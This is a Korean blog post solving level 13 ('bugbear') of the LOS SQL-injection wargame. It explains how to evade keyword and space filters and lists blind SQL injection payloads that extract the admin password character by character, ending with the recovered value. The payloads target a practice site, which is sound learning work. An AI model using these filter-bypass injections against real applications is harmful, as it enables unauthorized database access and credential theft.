레벨 13번 bugbear 풀이
제시문제
※ url에 ?를 쓰면 query를 날릴 수 있다.
쿼리문으로 유추할 수 있는 부분
이전 12번 문제에서 변동된 부분으로는 And, Or 이 막혀 || , &&(%26%26) 로 우회하고, like Char()도 in (Char())로 우회해주어야한다. 또한 or이 ord에도 영향을 미쳐 대신 hex()를 사용했다. 자동화 코드 전 필터링 된 부분을 하나하나 우회해 Hello Admin을 먼저 확인한다.
여기서 자동화 코드를 구현할때 원래 %06 등은 파이썬 내에서 받아들여지지않는데 /**/은 공백우회로 파이썬 내에서도 구현 시 문제 없이 가동이 가능하다. 해당 부분을 활용해 문제를 풀어준다.
{'pw': '1', 'no': '1/**/||/**/id/**/in/**/(char(97,100,109,105,110))/**/&&/**/hex(mid(pw,8,1))/**/in/**/(hex(64))'}
{'pw': '1', 'no': '1/**/||/**/id/**/in/**/(char(97,100,109,105,110))/**/&&/**/hex(mid(pw,8,1))/**/in/**/(hex(32))'}
{'pw': '1', 'no': '1/**/||/**/id/**/in/**/(char(97,100,109,105,110))/**/&&/**/hex(mid(pw,8,1))/**/in/**/(hex(48))'}
{'pw': '1', 'no': '1/**/||/**/id/**/in/**/(char(97,100,109,105,110))/**/&&/**/hex(mid(pw,8,1))/**/in/**/(hex(56))'}
{'pw': '1', 'no': '1/**/||/**/id/**/in/**/(char(97,100,109,105,110))/**/&&/**/hex(mid(pw,8,1))/**/in/**/(hex(52))'}
{'pw': '1', 'no': '1/**/||/**/id/**/in/**/(char(97,100,109,105,110))/**/&&/**/hex(mid(pw,8,1))/**/in/**/(hex(50))'}
{'pw': '1', 'no': '1/**/||/**/id/**/in/**/(char(97,100,109,105,110))/**/&&/**/hex(mid(pw,8,1))/**/in/**/(hex(49))'}
비밀번호는: 52dc3991
'Wargame' 카테고리의 다른 글
[LOS] 15번 assassin 문제 풀이 (0) | 2022.01.19 |
---|---|
[LOS] 14번 giant 문제 풀이 (0) | 2022.01.19 |
[LOS] 12번 darkknight 문제풀이 (0) | 2022.01.17 |
[LOS] 11번 golem 문제 풀이 (0) | 2022.01.17 |
[LOS] 10번 skeleton 문제 풀이 (0) | 2022.01.17 |